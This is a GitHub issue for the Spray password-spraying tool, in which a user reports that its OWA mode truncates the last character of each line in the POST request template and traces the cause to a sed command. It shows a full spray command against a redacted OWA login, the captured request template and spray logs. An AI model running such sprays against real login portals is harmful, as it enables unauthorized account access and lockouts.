search

Greenwolf / Spray

A Password Spraying tool for Active Directory Credentials by Jacob Wilkin(Greenwolf)
GNU General Public License v3.0
713 stars 136 forks source link

Post request file getting mangled when spraying OWA #9

Open v01dlight opened 3 years ago

v01dlight commented 3 years ago

I'm attempting to spray an OWA instance I know should contain some hits, but after letting a spray job run overnight it had gone through a decent chunk of the password list and found nothing which I thought was odd since this was against a userlist of 600+. I noticed that the spray-logs.txt file had a very large number in front of each attempt, which didn't match up with what I'd expect the byte size of a failed attempt to be. I double checked the post request file to make sure I didn't mess something up, and noticed that the IP in the host header was missing some digits. At first I thought I must have screwed it up when I pasted that data in from Burp, but then I realized every line had some characters chopped off the end. I set up a new spray to replicate the issue and verified that once the tool starts running, it is editing the supplied post request file in a way that mangles the attack. I redacted the actual IP and domain I was testing against, but you can see below that the post request looks correct before I start, and when checked after the attack is running it is missing the last character of every line.

root@kali:~# cat owa-post-request.txt 
POST /owa/auth.owa HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Connection: close
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=0
Upgrade-Insecure-Requests: 1

destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=1
root@kali:~# spray -owa "https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa" test-users.txt /opt/Spray/passwords-English.txt 2 35 owa-post-request.txt &
[1] 910149
root@kali:~# 
Spray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)

11:38:35 Spraying with password: Users Username
11:38:36 Spraying with password: RedactedOrgName1
cat: logs/usernamestoremove.txt: No such file or directory
rm: cannot remove 'logs/usernamestoremove.txt': No such file or directory

root@kali:~# tail logs/spray-logs.txt 
56468 joe.shmoe%joe.shmoe
56468 example.person%example.person
56468 abraham.lincoln%abraham.lincoln
56468 singleword%singleword
56468 joe.shmoe%Unity1
56468 example.person%Unity1
56468 abraham.lincoln%Unity1
56468 singleword%Unity1
root@kali:~# cat owa-post-request.txt
POST /owa/auth.owa HTTP/1.
Host: 1.1.1.
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.
Accept-Language: en-US,en;q=0.
Accept-Encoding: gzip, deflat
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fow
Content-Type: application/x-www-form-urlencode
Content-Length: 15
Connection: clos
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=
Upgrade-Insecure-Requests: 

destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=
root@kali:~#
v01dlight commented 3 years ago

I commented out line 177 sed -i.bak 's/.$//' $postrequest which seemed to be the culprit for cutting the last character off every line, but I'm still getting way different response sizes than I see in Burp. Not sure if the issue is solved.